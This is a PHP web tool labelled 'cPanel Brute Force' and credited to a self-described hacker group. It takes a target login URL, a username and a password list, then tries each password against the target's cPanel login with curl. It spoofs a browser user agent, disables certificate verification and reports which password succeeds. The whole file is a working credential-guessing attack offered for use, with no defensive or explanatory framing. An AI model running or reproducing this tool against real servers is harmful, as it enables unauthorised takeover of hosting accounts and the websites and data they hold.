Cpanel Brute Force

1. <?php
2. // ============================= //
3. # cPanel Brute Force
4. # Created by Lyonc
5. # Garuda Security Hacker
6. # Can Use On Localhost / cPanel
7. // ============================= //
8.  
9. error_reporting(0);
10.  
11. $lgurll = $_POST['lgurll'];
12. $user = $_POST['tguser'];
13. $passlists = $_POST['plists'];
14.  
15. echo '<head>
16. <meta name="viewport" content="width=device-width, initial-scale=1.0">
17. <title>cPanel Brute Force</title>
18. </head>
19. <body>
20. <center>
21. ';
22.  
23. if(isset($_POST['startbf']) && !empty($lgurll) && !empty($user) && !empty($passlists)){
24. $listspass = explode("\r\n", $passlists);
25. if(isset($_POST['brift'])){
26. foreach($listspass as $pass){
27. if(logcp($lgurll, urlencode($user), urlencode($pass))){
28. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="green">True</font><br/>'."\n";
29. break;
30. }else{
31. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="red">False</font><br/>'."\n";
32. }
33. }
34. }else{
35. foreach($listspass as $pass){
36. if(logcp($lgurll, urlencode($user), urlencode($pass))){
37. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="green">True</font><br/>'."\n";
38. }else{
39. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="red">False</font><br/>'."\n";
40. }
41. }
42. }
43. }else{
44. echo '<form method="POST">
45. <b><font size="6" color="indigo">cPanel Brute Force</font></b><br/>
46. <font color="gray">Work On cPanel And Localhost</font><br/>
47. <b>Login Url</b><br/>
48. <input type="text" size="40" name="lgurll" placeholder="Login Url" value="'.htmlspecialchars($lgurll).'"><br/>
49. <b>Username</b><br/>
50. <input type="text" size="40" name="tguser" placeholder="Username" value="'.htmlspecialchars($user).'"><br/>
51. <b>Password Lists</b><br/>
52. <textarea cols="30" rows="8" name="plists" placeholder="pass1
53. pass2
54. pass3">'.htmlspecialchars($passlists).'</textarea><br/>
55. <input type="checkbox" name="brift" value="Break If True"><font color="blue">Break If True</font><br/>
56. <input type="submit" name="startbf" value="START">
57. </form>
58. ';
59. }
60.  
61. echo '</center>
62. </body>';
63.  
64. function logcp($urllog, $login_email, $login_pass){
65. $cookielog = 'gsh_cookie';
66. $fp = fopen($cookielog, 'w');
67. fwrite($fp, '');
68. fclose($fp);
69. $ch = curl_init();
70. curl_setopt($ch, CURLOPT_URL, $urllog.'/login');
71. curl_setopt($ch, CURLOPT_POSTFIELDS, 'user='.$login_email.'&pass='.$login_pass.'&login=Login');
72. curl_setopt($ch, CURLOPT_POST, 1);
73. curl_setopt($ch, CURLOPT_HEADER, 0);
74. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
75. curl_setopt($ch, CURLOPT_COOKIEJAR, $cookielog);
76. curl_setopt($ch, CURLOPT_COOKIEFILE, $cookielog);
77. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
78. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
79. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
80. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3');
81. curl_setopt($ch, CURLOPT_REFERER, $urllog);
82. $page = curl_exec($ch) or die('<font color="red">Can\'t Connect to Host</font>');
83. if(!eregi('<title>cPanel Login</title>', $page)){
84. return TRUE;
85. }else{
86. return FALSE;
87. }
88. }
89. ?>